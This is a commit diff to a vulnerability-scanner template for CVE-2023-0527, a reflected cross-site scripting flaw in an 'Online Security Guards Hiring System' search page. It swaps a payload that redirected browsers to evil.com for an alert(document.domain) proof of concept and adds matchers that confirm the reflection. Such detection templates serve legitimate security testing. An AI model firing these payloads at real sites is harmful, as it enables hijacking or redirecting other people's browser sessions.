updated payload,matchers

2023-06-30 17:06:19 +05:30 · 2023-06-30 17:06:19 +05:30 · 64fcb1cf11
parent 5e95fc9c0f
commit 64fcb1cf11
1 changed files with 7 additions and 7 deletions
--- a/http/cves/2023/CVE-2023-0527.yaml
+++ b/http/cves/2023/CVE-2023-0527.yaml
@ -1,7 +1,7 @@
 id: CVE-2023-0527

 info:
-  name: Online Security Guards Hiring System - Reflected XSS
+  name: Online Security Guards Hiring System - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
@ -17,22 +17,22 @@ info:
    cwe-id: CWE-79
  metadata:
    verified: true
-  tags: cve,cve2023,osghs,xss,unauthenticated,reflected
+  tags: cve,cve2023,osghs,xss
+
 http:
  - raw:
      - |
-        POST /osghs/search-request.php HTTP/1.1
+        POST /search-request.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

-        searchdata=%3Cimg+src%3D%22%23%22+onerror%3D%22location.href%3D%27http%3A%2F%2Fevil.com%27%3B%22%3E&search=
+        searchdata=<img%20src=x%20onerror=alert(document.domain)>&search=

-    cookie-reuse: true
-    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "<img src=x onerror=alert(document.domain)>")'
          - 'contains(body, "Online Security Gauard Hiring System |Search Request")'
-          - 'contains(body, "evil.com")'
        condition: and